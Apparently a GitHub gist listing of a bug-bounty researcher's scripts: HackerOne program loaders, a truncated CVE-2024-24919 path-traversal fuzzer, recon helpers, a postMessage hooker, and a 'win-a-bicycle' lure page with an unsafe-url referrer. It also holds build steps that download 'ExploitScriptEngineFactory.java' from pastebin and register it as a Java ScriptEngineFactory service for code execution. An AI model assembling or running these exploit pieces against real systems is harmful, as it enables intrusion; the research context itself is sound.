
YasserGersy / HackeroneAuto.py
Last active July 2, 2024 10:59
Get Hackerone programs and assets
import requests,os,base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence urllib3's InsecureRequestWarning, the warning emitted when an HTTPS
# request is made without certificate verification.
# NOTE(review): the request calls are not visible in this excerpt. If they pass
# verify=False, the API token below is sent over a connection whose peer was
# never authenticated -- confirm, and prefer leaving verification enabled
# rather than hiding the warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Edit hacker and token with your handle and API token, or create auth.txt containing username:token
# NOTE(review): a token written into this file is stored in plain text and is
# published with the script if the file is shared; auth.txt keeps it out of the
# source, but should itself be excluded from version control.
# Run-time switches; their exact effect is decided by code outside this excerpt.
list_my_programs=False
bounty_only=True  # presumably restricts output to bounty-paying programs -- TODO confirm
scope_only=True  # presumably restricts output to in-scope assets -- TODO confirm
# Credentials, empty by default.
hacker=''
token=''
YasserGersy / CVE-2024-24919.auto.py
Created May 31, 2024 07:17
fuzz your subdomains list against checkpoint path traversal
import sys,re
import requests
import concurrent.futures
import threading
import os
import requests
import socket
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from termcolor import colored
YasserGersy / Reader.py
Created May 14, 2022 03:59
Python script to search for specific strings in big files
#!/bin/python -e
import sys,os,glob,time
# Module-level state shared by the rest of the script.
# `start` is the wall-clock reference taken once at import time;
# GetSecondsPassed() declares it global.
start = time.time()
# Error tally and debug switch both begin in their "off" state.
errors_count, debug = 0, False
# NOTE(review): the meaning of this constant is not visible in this excerpt.
max_id = 100011265576762
def GetSecondsPassed():
global start
end=time.time()
# Lay out a source tree with a META-INF/services directory, the location Java's
# ServiceLoader reads provider registrations from.
mkdir src
mkdir src/META-INF
mkdir src/META-INF/services
# Downloads Java source from a paste site with no checksum or signature check:
# the file is whatever the paste holds at fetch time. Read it before compiling.
curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java
# Provider-configuration file: registers ExploitScriptEngineFactory as a
# javax.script.ScriptEngineFactory implementation. Any JVM that discovers script
# engines from a classpath containing this tree will load that class, so keep
# the build output away from shared or production classpaths.
echo 'ExploitScriptEngineFactory' > src/META-INF/services/javax.script.ScriptEngineFactory
# Opens an interactive shell in an openjdk container with the current directory
# bind-mounted read-write at /code. The image is not pinned to a tag or digest.
# The two commands below are typed inside that container shell, not run on the host.
docker run -it -v `pwd`:/code openjdk /bin/bash
cd /code
# Compile at Java 8 source/target level.
javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java
<html>
<meta name="referrer" content="unsafe-url">
<body onload="f()">
<a href="" id="h"> home </a><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>
<div id="div1">
</div>
</hr><p style="float:left;">Type</p> <p style="color:green;padding-left : 20px;float:left;" >win-a-bicycle</p> <p style="padding-left : 20px;float:left;">in the two boxes and click enter</p><br/><img src="http://tiny.cc/img3" />
YasserGersy / Post.Message.html
Last active August 14, 2024 21:31
Post Message Hooker
<!DOCTYPE html>
<!-- Author Yasser Gersy @yassergersy v 2 -->
<html>
<head>
<meta charset="utf-8">
</head>
<script>
var last_message='';
var rcvd_msg_count=-2;
YasserGersy / pythphp_get_func_names.py
Created November 19, 2018 14:49
Get List of php and python functions
import requests
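# Download the PHP manual's function index and save the function names to
# php_fun_names.txt.
#
# The index is fetched over HTTPS so the page cannot be altered in transit
# before it is turned into a word list, with a timeout so a stalled server
# cannot hang the script, and a status check so an error page is not parsed
# as if it were the index.
r = requests.get('https://php.net/manual/en/indexes.functions.php', timeout=30)
r.raise_for_status()

names = []
# r.text is already text; splitting it directly (instead of encoding to bytes
# first) works on both Python 2 and Python 3.
for p in r.text.split('<a href="'):
    # Only hrefs of the form function.<name>.php are of interest; requiring the
    # trailing dot avoids an IndexError on other hrefs that merely start with
    # "function".
    if not p.startswith('function.'):
        continue
    href = p.split('"')[0]
    # Manual pages use dashes where the function name has underscores; the
    # final slice drops the last four characters (assumed to be ".php").
    names.append(href.split('function.')[1].replace('-', '_')[0:-4])

# Each name is followed by a bare carriage return, as in the original output.
# NOTE(review): confirm consumers of this file expect "\r" rather than "\n".
res = "".join(name + "\r" for name in names)

# The context manager closes the file even if the write fails.
with open('php_fun_names.txt', 'w') as out:
    out.write(res)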
YasserGersy / dirlister.py
Created July 9, 2018 23:35
Find directory listing in websites using wfuzz
import sys,os,requests
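# Usage banner printed at start-up. Written as a call with a single
# parenthesised argument so it prints the same text on Python 2 and is no
# longer a SyntaxError on Python 3.
print("""
____________________________________________________
Dir listing finder
usage python dirlister.py domains_path list_path
requirements wfuzz , python-requests
_____________________________________________________
""")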
YasserGersy / H1LP.py
Last active November 19, 2018 14:54
H1LP.py loads hackerone open programs
#!/bin/python
import requests
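# Best-effort suppression of urllib3 warnings. Called without a category,
# disable_warnings() silences every urllib3 HTTPWarning, which includes the
# InsecureRequestWarning raised for unverified HTTPS requests.
# NOTE(review): the request calls are outside this excerpt; if they disable
# certificate verification, nothing will report it once this has run.
try:
    requests.packages.urllib3.disable_warnings()
except Exception:
    # Narrowed from a bare except so Ctrl-C and SystemExit are not swallowed.
    print('Error')
# Start-up banner; single-argument print calls behave the same on Python 2 and 3.
print('Hackerone programs loader')
print('--------------------------------------------------------')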
YasserGersy / HackthisSite_realistic_6.py
Last active November 19, 2018 14:55
HackthisSite realistic 6
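def most_common(lst):
    """Return the element that occurs most often in *lst*.

    Occurrences are tallied in a single pass instead of calling
    ``lst.count`` once per distinct element, so the cost is linear in the
    input length and any iterable of hashable items is accepted. When
    several elements share the highest count, the one seen first wins,
    which makes the result independent of set iteration order.

    Raises:
        ValueError: if *lst* is empty.
    """
    from collections import Counter

    counts = Counter(lst)
    # max() over an empty mapping raises ValueError, matching the original
    # behaviour for empty input.
    return max(counts, key=counts.get)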
def stripme(d):
    """Return the items of *d* that pass the digit test, joined into one string.

    An item is kept when it is found in the literal '0123456789'; for a
    string argument this keeps the ASCII digits in their original order
    and drops every other character.
    """
    digits = '0123456789'
    return ''.join(ch for ch in d if ch in digits)